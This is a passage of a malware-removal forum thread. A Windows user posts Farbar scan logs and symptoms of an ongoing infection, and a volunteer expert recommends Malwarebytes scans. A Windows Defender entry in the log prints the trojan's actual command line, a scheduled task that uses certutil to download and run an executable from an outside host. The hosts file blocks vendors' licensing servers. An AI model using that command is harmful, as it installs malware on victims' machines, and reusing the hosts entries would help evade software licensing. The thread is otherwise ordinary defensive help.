Shortcut: C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\LLH4 Megève\LLH_WINTER.lnk -> D:\Dovetail Games - Flight\Microsoft Flight Simulator X Steam Edition\LLH_WINTER.bat ()
Shortcut: C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\LLH\LLH8X\LLH8X_Summer.lnk -> D:\Dovetail Games - Flight\Microsoft Flight Simulator X Steam Edition\Addon Scenery\LLH8X\Scenery\LLH8X_Summer.bat ()
Shortcut: C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\LLH\LLH8X\LLH8X_SummerBasePack.lnk -> D:\Dovetail Games - Flight\Microsoft Flight Simulator X Steam Edition\Addon Scenery\LLH8X\Scenery\LLH8X_SummerBasePack.bat ()
Shortcut: C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\LLH\LLH8X\LLH8X_Winter.lnk -> D:\Dovetail Games - Flight\Microsoft Flight Simulator X Steam Edition\Addon Scenery\LLH8X\Scenery\LLH8X_Winter.bat ()
Shortcut: C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\LLH\LLH7X\LLH7X_Summer.lnk -> D:\Dovetail Games - Flight\Microsoft Flight Simulator X Steam Edition\Addon Scenery\LLH7X\Scenery\LLH7X_Summer.bat ()
Shortcut: C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\LLH\LLH7X\LLH7X_SummerBasePack.lnk -> D:\Dovetail Games - Flight\Microsoft Flight Simulator X Steam Edition\Addon Scenery\LLH7X\Scenery\LLH7X_SummerBasePack.bat ()
Shortcut: C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\LLH\LLH7X\LLH7X_Winter.lnk -> D:\Dovetail Games - Flight\Microsoft Flight Simulator X Steam Edition\Addon Scenery\LLH7X\Scenery\LLH7X_Winter.bat ()

==================== Loaded Modules (Whitelisted) =============

2009-02-23 12:28 - 2009-02-23 12:28 - 000013824 _____ (Creative Technology Ltd) [File not signed] C:\Windows\System32\ctagent.DLL
2009-02-23 12:27 - 2009-02-23 12:27 - 000175104 _____ (Creative Technology Ltd) [File not signed] C:\WINDOWS\System32\CTDCIFCE.DLL
2009-02-23 12:16 - 2009-02-23 12:16 - 000067584 _____ (Creative Technology Ltd) [File not signed] C:\WINDOWS\System32\CTDPROXY.DLL
2009-02-23 12:28 - 2009-02-23 12:28 - 000061952 _____ (Creative Technology Ltd) [File not signed] C:\Windows\System32\ctpcmcia.DLL
2009-02-23 12:28 - 2009-02-23 12:28 - 000046592 _____ (Creative Technology Ltd) [File not signed] C:\Windows\System32\ctspkhlp.DLL
2016-12-07 20:44 - 2016-12-07 20:44 - 000373248 _____ (IntelleSoft) [File not signed] C:\Program Files\Highresolution Enterprises\X-Mouse Button Control\BugTrapU-x64.dll
2017-09-29 00:39 - 2017-09-29 00:39 - 000252928 _____ (Microsoft Corporation) [File not signed] C:\Program Files (x86)\Common Files\Microsoft Shared\Phone Tools\CoreCon\11.0\bin\IpOverUsbPc.DLL
2019-02-18 21:23 - 2019-10-26 22:44 - 000281600 _____ (Microsoft Corporation) [File not signed] C:\Program Files\Common Files\Microsoft Shared\ClickToRun\APPVFILESYSTEMMETADATA.dll
2019-02-18 21:23 - 2019-10-26 22:44 - 000400896 _____ (Microsoft Corporation) [File not signed] C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvApi.dll
2019-02-18 21:23 - 2019-10-26 22:44 - 001124864 _____ (Microsoft Corporation) [File not signed] C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll
2019-02-18 21:23 - 2019-10-26 22:44 - 000519680 _____ (Microsoft Corporation) [File not signed] C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvVirtualization.dll
2019-02-18 21:23 - 2019-10-26 22:44 - 000836608 _____ (Microsoft Corporation) [File not signed] C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVOrchestration.dll
2019-02-18 21:23 - 2019-10-26 22:44 - 000585008 _____ (Microsoft Windows -> Microsoft Corporation) [File not signed] C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVCatalog.dll
2019-02-18 21:23 - 2019-10-26 22:44 - 001642800 _____ (Microsoft Windows -> Microsoft Corporation) [File not signed] C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIntegration.dll
2019-02-18 21:23 - 2019-10-26 22:44 - 000177968 _____ (Microsoft Windows -> Microsoft Corporation) [File not signed] C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvStreamingManager.dll
2019-02-18 21:23 - 2019-10-26 22:44 - 001010992 _____ (Microsoft Windows -> Microsoft Corporation) [File not signed] C:\Program Files\Common Files\Microsoft Shared\ClickToRun\APPVMANIFEST.dll
2019-02-18 21:23 - 2019-10-26 22:44 - 001091888 _____ (Microsoft Windows -> Microsoft Corporation) [File not signed] C:\Program Files\Common Files\Microsoft Shared\ClickToRun\APPVPOLICY.dll
2017-05-26 12:29 - 2017-05-26 12:29 - 000116224 _____ (pdfforge GmbH) [File not signed] C:\WINDOWS\System32\pdfcmon.dll

==================== Alternate Data Streams (Whitelisted) ========

==================== Safe Mode (Whitelisted) ==================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"

==================== Association (Whitelisted) =================

==================== Internet Explorer trusted/restricted ==========

==================== Hosts content: =========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2015-07-10 13:04 - 2019-06-18 13:33 - 000001666 ____R C:\WINDOWS\system32\drivers\etc\hosts
127.0.0.1 precisionmanuals.com
127.0.0.1 www.precisionmanuals.com
127.0.0.1 license.precisionmanuals.com
127.0.0.1                   auth.cycling74.com
127.0.0.1                   auth64.cycling74.com
127.0.0.1    www.techsmith.com
127.0.0.1    activation.cloud.techsmith.com
127.0.0.1    oscount.techsmith.com
127.0.0.1    updater.techsmith.com
127.0.0.1    camtasiatudi.techsmith.com
127.0.0.1    tsccloud.cloudapp.net
127.0.0.1    assets.cloud.techsmith.com
127.0.0.1       65.52.240.48
127.0.0.1       oscount.techsmith.com
127.0.0.1       69.167.144.18
127.0.0.1    www.techsmith.com
127.0.0.1    activation.cloud.techsmith.com
127.0.0.1    oscount.techsmith.com
127.0.0.1    updater.techsmith.com
127.0.0.1    camtasiatudi.techsmith.com
127.0.0.1    tsccloud.cloudapp.net
127.0.0.1    assets.cloud.techsmith.com

==================== Other Areas ===========================

(Currently there is no automatic fix for this section.)

HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> D:\Program Files (x86)\Embarcadero\Studio\19.0\bin;C:\Users\Public\Documents\Embarcadero\Studio\19.0\Bpl;D:\Program Files (x86)\Embarcadero\Studio\19.0\bin64;C:\Users\Public\Documents\Embarcadero\Studio\19.0\Bpl\Win64;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\ProgramData\Oracle\Java\javapath;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static;C:\Program Files\Microsoft SQL Server\110\Tools\Binn\;C:\Program Files (x86)\GtkSharp\2.12\bin;C:\Program Files (x86)\NVIDIA Corporation\PhysX\Common;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\WINDOWS\System32\OpenSSH\;C:\Program Files (x86)\QuickTime\QTSystem\;C:\Program Files\NVIDIA Corporation\NVIDIA NvDLISR;C:\Program Files\dotnet\
HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\Control Panel\Desktop\\Wallpaper -> C:\Windows\web\wallpaper\Windows\img0.jpg
DNS Servers: 1.1.1.1 - 1.0.0.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: Warn)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

(If an entry is included in the fixlist, it will be removed.)

HKLM\...\StartupApproved\Run: => "AdobeGCInvoker-1.0"
HKLM\...\StartupApproved\Run: => "AdobeAAMUpdater-1.0"
HKLM\...\StartupApproved\Run: => "Greenshot"
HKLM\...\StartupApproved\Run: => "iTunesHelper"
HKLM\...\StartupApproved\Run32: => "StartCCC"
HKLM\...\StartupApproved\Run32: => "AsioThk32Reg"
HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\StartupApproved\Run: => "OneDrive"
HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\StartupApproved\Run: => "Steam"
HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\StartupApproved\Run: => "Viber"

==================== FirewallRules (Whitelisted) ================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [TCP Query User{91AC375A-B6EC-4001-802D-B72C16747E11}C:\programdata\logishrd\logioptions\software\current\logioptionsmgr.exe] => (Allow) C:\programdata\logishrd\logioptions\software\current\logioptionsmgr.exe (Logitech Inc -> Logitech, Inc.)
FirewallRules: [UDP Query User{A6F1920D-D88E-48EB-B0AB-6804B6D1752E}C:\programdata\logishrd\logioptions\software\current\logioptionsmgr.exe] => (Allow) C:\programdata\logishrd\logioptions\software\current\logioptionsmgr.exe (Logitech Inc -> Logitech, Inc.)
FirewallRules: [{93EDDD15-9B7C-4447-ABAE-501201FF8A61}] => (Block) C:\programdata\logishrd\logioptions\software\current\logioptionsmgr.exe (Logitech Inc -> Logitech, Inc.)
FirewallRules: [{C3DDABFC-FE5E-4CC3-9C79-344AB623C7DB}] => (Block) C:\programdata\logishrd\logioptions\software\current\logioptionsmgr.exe (Logitech Inc -> Logitech, Inc.)
FirewallRules: [TCP Query User{BF23CCF8-3722-4E94-BBCD-048D218B58ED}D:\dovetail games - flight\microsoft flight simulator x steam edition\fsx.exe] => (Allow) D:\dovetail games - flight\microsoft flight simulator x steam edition\fsx.exe (RailSimulator T/A Dovetail -> Microsoft Corp.)
FirewallRules: [UDP Query User{CCB1BECF-8668-4A0A-81EA-7482FB3A4DE8}D:\dovetail games - flight\microsoft flight simulator x steam edition\fsx.exe] => (Allow) D:\dovetail games - flight\microsoft flight simulator x steam edition\fsx.exe (RailSimulator T/A Dovetail -> Microsoft Corp.)
FirewallRules: [{F0D42ECE-AF71-4409-A450-E3F863137671}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{5EBA522B-A804-426C-839D-4449D306556A}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{23C98884-7855-4B47-9DCE-7656330C8DFC}] => (Allow) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{5D8EC213-3D1D-4722-956F-E0A2CC9E212B}] => (Allow) C:\Program Files\iTunes\iTunes.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [TCP Query User{021D1265-3A31-43D0-9520-4E7D81972374}C:\program files\cycling '74\max 7\max.exe] => (Allow) C:\program files\cycling '74\max 7\max.exe (Cycling '74) [File not signed]
FirewallRules: [UDP Query User{C66DEFFE-A5F1-4B7E-A74E-F9368D6D6EC0}C:\program files\cycling '74\max 7\max.exe] => (Allow) C:\program files\cycling '74\max 7\max.exe (Cycling '74) [File not signed]
FirewallRules: [{A8361D34-69CE-446C-9567-9A0EFC8AF75A}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{F3D527C7-4F10-47C7-ABC4-820BCD31768B}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{486EB322-4CC3-4726-8F83-95DCE3A309AE}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{F7124E26-2B62-49EC-8E6B-F2B5F4288ECC}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{287425B3-761D-4793-BD0B-39346EA97794}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{629429D6-E5F3-4D9E-87A1-668E6E2578AF}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{09C709D6-BEC4-4FE0-8569-D32BE72EBB20}] => (Allow) LPort=8318
FirewallRules: [{97B5B393-FE3F-4B8E-8BA8-A8FDEE7DF18F}] => (Allow) C:\Program Files\qBittorrent\qbittorrent.exe () [File not signed]
FirewallRules: [{F13A0E2B-3CE0-497A-A237-A2034F33A8E6}] => (Allow) C:\Program Files\qBittorrent\qbittorrent.exe () [File not signed]
FirewallRules: [{39B466A5-4C25-4C27-90D2-6CA05D4A0AF4}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer GmbH -> TeamViewer GmbH)
FirewallRules: [{DD68D091-C860-4103-B578-87949E0C39C5}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer GmbH -> TeamViewer GmbH)
FirewallRules: [{3FA6B652-D2F9-43D5-8487-2643470B90D9}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer GmbH -> TeamViewer GmbH)
FirewallRules: [{65D7C44B-7B22-436F-81D1-83ED80E67633}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer GmbH -> TeamViewer GmbH)
FirewallRules: [{B74858EF-98FA-4A92-81DC-4F17DCAB4DEA}] => (Allow) C:\Program Files (x86)\Dropbox\Client\Dropbox.exe (Dropbox, Inc -> Dropbox, Inc.)
FirewallRules: [TCP Query User{D17DCF5C-B1C8-4216-9754-89508AAA6F02}C:\program files\native instruments\native access\addlibrary.exe] => (Allow) C:\program files\native instruments\native access\addlibrary.exe () [File not signed]
FirewallRules: [UDP Query User{59A3E512-E9CB-419C-AB1B-2B0EF51A5B9C}C:\program files\native instruments\native access\addlibrary.exe] => (Allow) C:\program files\native instruments\native access\addlibrary.exe () [File not signed]

==================== Restore Points =========================

19-11-2019 13:12:33 Scheduled Checkpoint

==================== Faulty Device Manager Devices ============


==================== Event log errors: ========================

Application errors:
==================
Error: (11/25/2019 01:39:05 AM) (Source: SideBySide) (EventID: 78) (User: )
Description: Activation context generation failed for "C:\Global Prime - MetaTrader 4\terminal.exe".Error in manifest or policy file "" on line .
A component version required by the application conflicts with another component version already active.
Conflicting components are:.
Component 1: C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_fb429a5930656358.manifest.
Component 2: C:\WINDOWS\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_42efd13044e18c5e.manifest.

Error: (11/25/2019 01:38:31 AM) (Source: SideBySide) (EventID: 78) (User: )
Description: Activation context generation failed for "C:\Global Prime - MetaTrader 4\terminal.exe".Error in manifest or policy file "" on line .
A component version required by the application conflicts with another component version already active.
Conflicting components are:.
Component 1: C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_fb429a5930656358.manifest.
Component 2: C:\WINDOWS\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_42efd13044e18c5e.manifest.

Error: (11/25/2019 01:38:18 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Local Hostname DESKTOP-A0OS1Q6.local already in use; will try DESKTOP-A0OS1Q6-2.local instead

Error: (11/25/2019 01:38:18 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: mDNSCoreReceiveResponse: ProbeCount 2; will deregister    4 DESKTOP-A0OS1Q6.local. Addr 192.168.1.8

Error: (11/25/2019 01:38:18 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: mDNSCoreReceiveResponse: Received from 192.168.1.8:5353   16 DESKTOP-A0OS1Q6.local. AAAA 2A02:2149:8760:9E00:3949:B56E:7C2E:3B0B


System errors:
=============
Error: (11/25/2019 01:40:19 AM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID
Windows.SecurityCenter.WscBrokerManager
 and APPID
Unavailable
 to the user NT AUTHORITY\SYSTEM SID (S-1-5-18) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.

Error: (11/25/2019 01:40:19 AM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID
Windows.SecurityCenter.WscDataProtection
 and APPID
Unavailable
 to the user NT AUTHORITY\SYSTEM SID (S-1-5-18) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.

Error: (11/25/2019 01:35:23 AM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-A0OS1Q6)
Description: The server {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} did not register with DCOM within the required timeout.

Error: (11/25/2019 01:35:23 AM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-A0OS1Q6)
Description: The server {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} did not register with DCOM within the required timeout.

Error: (11/25/2019 01:35:23 AM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-A0OS1Q6)
Description: The server {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} did not register with DCOM within the required timeout.


Windows Defender:
===================================
Date: 2019-11-25 01:38:49.423
Description:
Windows Defender Antivirus has detected malware or other potentially unwanted software.
For more information please see the following:
https://go.microsoft...14&enterprise=0
Name: Trojan:Win32/Ceprolad.A
ID: 2147726914
Severity: Severe
Category: Trojan
Path: CmdLine:_C:\Windows\System32\schtasks.exe /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR cmd.exe /C certutil.exe -urlcache -split -f http://tfortytimes.com/app/app.exeC:\Users\SR\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\SR\AppData\Local\Temp\csrss\scheduled.exe /31340 /TN ScheduledUpdate /F
Detection Origin: Unknown
Detection Type: Concrete
Detection Source: System
Process Name: Unknown
Signature Version: AV: 1.305.2744.0, AS: 1.305.2744.0, NIS: 1.305.2744.0
Engine Version: AM: 1.1.16500.1, NIS: 1.1.16500.1

CodeIntegrity:
===================================

Date: 2019-11-25 01:38:49.794
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\drivers\Winmon.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

==================== Memory info ===========================

BIOS: American Megatrends Inc. F9 10/23/2013
Motherboard: Gigabyte Technology Co., Ltd. B75-D3V
Processor: Intel® Core™ i7-3770 CPU @ 3.40GHz
Percentage of memory in use: 28%
Total physical RAM: 16331.55 MB
Available physical RAM: 11668.86 MB
Total Virtual: 16631.55 MB
Available Virtual: 10186.83 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:231.78 GB) (Free:64.88 GB) NTFS
Drive d: (New BU) (Fixed) (Total:931.39 GB) (Free:158.16 GB) NTFS
Drive e: (New Volume) (Fixed) (Total:931.51 GB) (Free:64.95 GB) NTFS
Drive f: (BU) (Fixed) (Total:1863.01 GB) (Free:203.93 GB) NTFS

\\?\Volume{00fc4e36-48f8-4543-8741-951af844353c}\ () (Fixed) (Total:0 GB) (Free:0 GB)
\\?\Volume{0f7535bc-bb12-4bb5-9367-1087afe3ce64}\ () (Fixed) (Total:0 GB) (Free:0 GB)
\\?\Volume{d3c45f89-7398-47bf-8292-fa43e6189f5c}\ () (Fixed) (Total:0.1 GB) (Free:0.07 GB) FAT32

==================== MBR & Partition Table ====================

==========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 232.9 GB) (Disk ID: 1F5C5EF9)

Partition: GPT.

==========================================================
Disk: 1 (Protective MBR) (Size: 931.5 GB) (Disk ID: 00000000)

Partition: GPT.

==========================================================
Disk: 2 (MBR Code: Windows 7/8/10) (Size: 931.5 GB) (Disk ID: 0B480A61)
Partition 1: (Not Active) - (Size=931.5 GB) - (Type=07 NTFS)

==========================================================
Disk: 3 (MBR Code: Windows 7/8/10) (Size: 1863 GB) (Disk ID: 00738CFB)
Partition 1: (Not Active) - (Size=1863 GB) - (Type=07 NTFS)

==================== End of Addition.txt =======================


#6
spra

    Member

  • Topic Starter
  • 78 posts

Some issues remain:

1) When I start Firefox and go to Google, periodically they still ask me to verify I am not a robot, because there has been suspicious activity from my IP.
2) Some of my bookmarked internet pages in Firefox’s toolbar do not respond when clicking on them, while others do respond.
3) Worst of all, I got a few PC crashes with blue screens since yesterday. During the last one, which was at 18.45 today the screen remained stuck at the blue screen (the PC did not restart automatically) after it had completed 100% of the info selection. So, I had to shut down with the button and restart it myself. On the blue screen it said “CRITICAL STRUCTURE CORRUPTION”.
4) Windows Defender notifies me several times per day that it has found threats and in the history I can see some Trojans, mostly Trojan:Win32/Ceprolad.A being repeated.

What has stopped so far is the sudden opening of browser windows. Also I can now open Malwarebytes or install its new version.

Do you think it's a good idea to install and run it, or should I wait for your instructions?

Thank you
 


#7
RKinner

    Malware Expert

  • Expert
  • 22,034 posts
  • MVP

The infection is still with us so see if you can get MBAM to scan.  In addition try their new rootkit scan MBAR: 

https://www.malwareb...om/antirootkit/

 

Then run a new FRST scan so I can see if it got it.

 

PS  Don't worry about delays.  I do not keep track.
 


#8
spra

    Member

  • Topic Starter
  • 78 posts

After your reply I tried to run MBAM but again this time, I could not access it.
So, instead I ran their mbar. It found a lot of malware which it cleaned up!
Then I rebooted and tried MBAM once more and this time I was able to run it. It found only 1 PUP.Optional.Online.IO which it quarantined. Then I rebooted again.
Then I ran FRST and here are the two logs:

 

 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 25-11-2019 01
Ran by SR (administrator) on DESKTOP-A0OS1Q6 (Gigabyte Technology Co., Ltd. To be filled by O.E.M.) (26-11-2019 14:02:38)
Running from D:\Users\SR\Downloads
Loaded Profiles: SR (Available Profiles: SR & Administrator)
Platform: Windows 10 Pro Version 1803 17134.345 (X64) Language: English (United States)
Default browser: FF
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

() [File not signed] C:\Program Files (x86)\DSDCS\InputMapper HidGuardian\InputMapperCerberusWhitelister.exe
(Adobe Inc. -> Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe
(Adobe Inc. -> Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe
(Adobe Systems Incorporated -> Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe
(Apple Inc. -> Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Apple Inc. -> Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Brio) [File not signed] C:\Program Files\FolderSize\FolderSizeSvc.exe
(Creative Labs Inc -> Creative Technology Ltd) C:\Windows\SysWOW64\CtHelper.exe
(Dropbox, Inc -> Dropbox, Inc.) C:\Program Files (x86)\Dropbox\Client\Dropbox.exe
(Dropbox, Inc -> Dropbox, Inc.) C:\Program Files (x86)\Dropbox\Client\Dropbox.exe
(Dropbox, Inc -> Dropbox, Inc.) C:\Program Files (x86)\Dropbox\Client\Dropbox.exe
(Dropbox, Inc -> Dropbox, Inc.) C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
(Dropbox, Inc -> Dropbox, Inc.) C:\Windows\System32\DbxSvc.exe
(Dropbox, Inc -> The Qt Company Ltd.) C:\Program Files (x86)\Dropbox\Client\85.4.155\QtWebEngineProcess.exe
(Dropbox, Inc -> The Qt Company Ltd.) C:\Program Files (x86)\Dropbox\Client\85.4.155\QtWebEngineProcess.exe
(Dropbox, Inc -> The Qt Company Ltd.) C:\Program Files (x86)\Dropbox\Client\85.4.155\QtWebEngineProcess.exe
(Invincea, Inc. -> Sandboxie Holdings, LLC) C:\Program Files\Sandboxie\SbieCtrl.exe
(Invincea, Inc. -> Sandboxie Holdings, LLC) C:\Program Files\Sandboxie\SbieSvc.exe
(Logitech Inc -> Logitech) C:\ProgramData\Logishrd\LogiOptions\Software\Current\LogiOverlay.exe
(Logitech Inc -> Logitech, Inc.) C:\Program Files\Common Files\Logishrd\KHAL3\KHALMNPR.exe
(Logitech Inc -> Logitech, Inc.) C:\Program Files\Logitech\LogiOptions\LogiOptions.exe
(Logitech Inc -> Logitech, Inc.) C:\Program Files\Logitech\SetPointP\SetPoint.exe
(Logitech Inc -> Logitech, Inc.) C:\ProgramData\Logishrd\LogiOptions\Software\Current\LogiOptionsMgr.exe
(Malwarebytes Inc -> Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
(Malwarebytes Inc -> Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Common Files\microsoft shared\Phone Tools\CoreCon\11.0\bin\IpOverUsbSvc.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
(Microsoft Windows -> Microsoft Corporation) C:\Program Files\Windows Defender\MSASCuiL.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\MusNotifyIcon.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.1910.4-0\MsMpEng.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.1910.4-0\NisSrv.exe
(NVIDIA Corporation -> Node.js) C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe
(Open Source Developer, Phillip Gibbons -> Highresolution Enterprises) C:\Program Files\Highresolution Enterprises\X-Mouse Button Control\XMouseButtonControl.exe
(Oracle America, Inc. -> Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(PACE Anti-Piracy, Inc. -> PACE Anti-Piracy, Inc.) C:\Program Files (x86)\Common Files\PACE\Services\LicenseServices\LDSvc.exe
(Polenter - Pawel Idzikowski -> Polenter - Software Solutions) C:\Program Files (x86)\Desktop-Reminder 2\DesktopReminder2.exe
(Reprise Software Inc.) [File not signed] C:\Program Files (x86)\The Foundry\LicensingTools7.0\bin\RLM\rlm.foundry.exe
(Reprise Software Inc.) [File not signed] C:\Program Files (x86)\The Foundry\LicensingTools7.0\bin\RLM\rlm.foundry.exe
(TeamViewer GmbH -> TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
(WinAbility Software Corporation -> WinAbility® Software Corporation) C:\Program Files\IconShepherd\ISEXE64.exe

==================== Registry (Whitelisted) ===================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [SecurityHealth] => C:\Program Files\Windows Defender\MSASCuiL.exe [638872 2018-04-12] (Microsoft Windows -> Microsoft Corporation)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [508128 2016-07-01] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
HKLM\...\Run: [XMouseButtonControl] => C:\Program Files\Highresolution Enterprises\X-Mouse Button Control\XMouseButtonControl.exe [1605856 2019-08-18] (Open Source Developer, Phillip Gibbons -> Highresolution Enterprises)
